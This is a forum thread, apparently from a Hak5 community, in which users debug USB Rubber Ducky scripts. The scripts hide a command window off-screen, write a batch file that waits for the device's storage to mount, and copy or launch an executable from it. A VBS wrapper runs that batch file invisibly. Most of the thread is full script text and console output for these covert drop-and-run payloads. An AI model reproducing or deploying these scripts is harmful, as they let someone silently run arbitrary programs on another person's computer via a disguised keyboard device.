freeze Posted May 21, 2015 Share Posted May 21, 2015 yesterday buy it... and i need help. How do with this usb: copy *.exe to (for expl:C:\1.exe) and run 1.exe. how? Thanks. Quote Link to comment Share on other sites More sharing options...
Rkiver Posted May 21, 2015 Share Posted May 21, 2015 A very quick google shows the following: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---copy-file-to-desktop REM Author: overwraith REM Name: CopyFileToDesktop.txt REM Purpose: Wait for ducky mass storage to mount, then copy file to desktop. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI r DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if Exist %DUCKYdrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. REM Remove the next two lines if you don't place your payloads in separate folders. STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\ ENTER STRING copy %DUCKYdrive%HelloWorld.exe %userprofile%\Desktop\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER Quote Link to comment Share on other sites More sharing options...
freeze Posted May 22, 2015 Author Share Posted May 22, 2015 What is the problem? Quote Link to comment Share on other sites More sharing options...
freeze Posted May 28, 2015 Author Share Posted May 28, 2015 Use script: REM Author: overwraith REM Name: RunEXE_V2.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI r DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if Exist %DUCKYdrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DUCKYdrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM STRING EXIT REM ENTER And nothing happens ... Quote Link to comment Share on other sites More sharing options...
freeze Posted June 2, 2015 Author Share Posted June 2, 2015 What the problem at this script? C:\Documents and Settings\Administrator>CD %TEMP%C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>erase /Q DuckyWait.batC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>copy con DuckyWait.bat:while1for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)if Exist %DUCKYdrive% (goto :break)timeout /t 30goto :while1:breakSTART %DUCKYdrive%\HelloWorld.exe^Z 1 file(s) copied.C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>DuckyWait.batThe syntax of the command is incorrect.C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp> Quote Link to comment Share on other sites More sharing options...
barry99705 Posted June 5, 2015 Share Posted June 5, 2015 Looks like it doesn't like something in the batch file. Quote Link to comment Share on other sites More sharing options...
freeze Posted June 5, 2015 Author Share Posted June 5, 2015 what I understand from the answer of the console.I tried all the options autorun. No results.Specifically, it does not copy a file from a flash card to the PC. Quote Link to comment Share on other sites More sharing options...
freeze Posted June 6, 2015 Author Share Posted June 6, 2015 Answers How to copy a file from the ducky?Not one of the scripts do not do it .. Quote Link to comment Share on other sites More sharing options...
fugu Posted June 6, 2015 Share Posted June 6, 2015 maybe just try part of the script, without running the duckyscript, but from the cmd line. echo list volume ^| diskpart ^| findstr "DUCKY" I think this should display the usb drive info for the ducky when the ducky is plugged in. can you verify? Quote Link to comment Share on other sites More sharing options...
freeze Posted June 9, 2015 Author Share Posted June 9, 2015 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>echo list volume ^| diskpart ^| findstr "DUCK Y" list volume | diskpart | findstr "DUCKY" C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp> Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 9, 2015 Share Posted June 9, 2015 I am not sure quite what is wrong, this works on everybody else's computers, but I have some ideas on what could be wrong. I have had instances were websites and forums etc will add newline characters where there shouldn't be any. Make sure that there are no newline characters where there shouldn't be. My lines in my scripts tend to be very long due to the fact that there needs to be an inherent complexity in batch in order to get the same functionality of better programming languages which are unavailable to duckys. Additionally go through the script and the actual output line by line and check to make sure that the script matches up with the actual output, if characters are being skipped then you should be able to see them. A lot of ducky-ing is just debugging. One additional thing that could be happening is that you might not have the correct firmware installed. This script is supposed to run "silently" once the payload has been typed in, so it will wait silently until the drive with the file to copy is plugged in. If you don't have the correct firmware installed on your ducky, then the ducky will not mount the SD, which means the script will essentially run silently forever. If anything else comes to mind I will post back. Quote Link to comment Share on other sites More sharing options...
fugu Posted June 10, 2015 Share Posted June 10, 2015 I think you may be on to something with copy + paste. Maybe just try typing the command on the command line diskpart list volume (i think that's right?) Quote Link to comment Share on other sites More sharing options...
freeze Posted June 10, 2015 Author Share Posted June 10, 2015 I think you may be on to something with copy + paste. Maybe just try typing the command on the command line diskpart list volume(i think that's right?) C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>diskpart list volume Microsoft DiskPart version 5.1.3565 Copyright (C) 1999-2003 Microsoft Corporation. On computer: FFA2 DiskPart was unable to process the parameters. Use 'diskpart /?' for more information. C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp> Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 10, 2015 Share Posted June 10, 2015 Actually I think the echo is important, I don't think you can send parameters to diskpart like "list" and "volume". echo list volume | diskpart Quote Link to comment Share on other sites More sharing options...
freeze Posted June 11, 2015 Author Share Posted June 11, 2015 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>echo list volume | diskpart Microsoft DiskPart version 5.1.3565 Copyright (C) 1999-2003 Microsoft Corporation. On computer: FFA2 DISKPART> Volume ### Ltr Label Fs Type Size Status Info ---------- --- ----------- ----- ---------- ------- --------- -------- Volume 0 D CD-ROM 0 B Volume 1 C NTFS Partition 64 GB Healthy System DISKPART> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp> Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 11, 2015 Share Posted June 11, 2015 (edited) In your output diskpart says that the ducky is not connected. Make sure you have the right firmware installed, you need twin duck or something in order for this to work and copy the file to the host computer (I don't remember which of the twin ducks you need, try both of em, takes several seconds to mount the SD). You see, twin duck firmware allows the ducky to mount the micro SD card as mass storage, and simultaneously type like a keyboard, it does not come on the ducky standard. Alternatively you could provide your own flash drive, label it "DUCKY" and put the exe's you want to copy on the flash drive. Here is where a lot of the firmware looks like it is, I used to get it at ducky decode, but it looks like it has been moved to github. https://github.com/midnitesnake/usb-rubber-ducky Here is something on flashing the ducky, can't find the handy dandy word doc that midnight snake made; https://github.com/midnitesnake/USB-Rubber-Ducky/wiki/Flashing-ducky In the "CopyFileToDesktop.txt" script it assumes that you want to put your exes in a specific folder on your flash drive/ducky micro SD. Pay particular attention to these particular lines of the script. REM Remove the next two lines if you don't place your payloads in separate folders. STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\ ENTER STRING copy %DUCKYdrive%HelloWorld.exe %userprofile%\Desktop\HelloWorld.exe ENTER The reason for a lot of the bulk in the script is that you don't necessarily know how long it will take for the ducky to mount the micro sd, so you actually have to wait for it to be connected, essentially polling for it. I think that this problem used to be a lot worse than it is right now, something appears to have gotten faster, or perhaps my computer upgrade has sped things up, I am not sure. There could have been tweaks to the ducky firmware, I am not sure. It at least seems to me that the problem was a lot worse when I was actually coding this script. Of course you will actually have to modify the copy command in the script to reflect the exe names/exe group, as well as the folder name you decide to stick them in. Pay particular attention to the first line of the previous snippet if you want to place them in a specific folder as you will have to modify the script a little bit. "STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\" Edited June 11, 2015 by overwraith Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.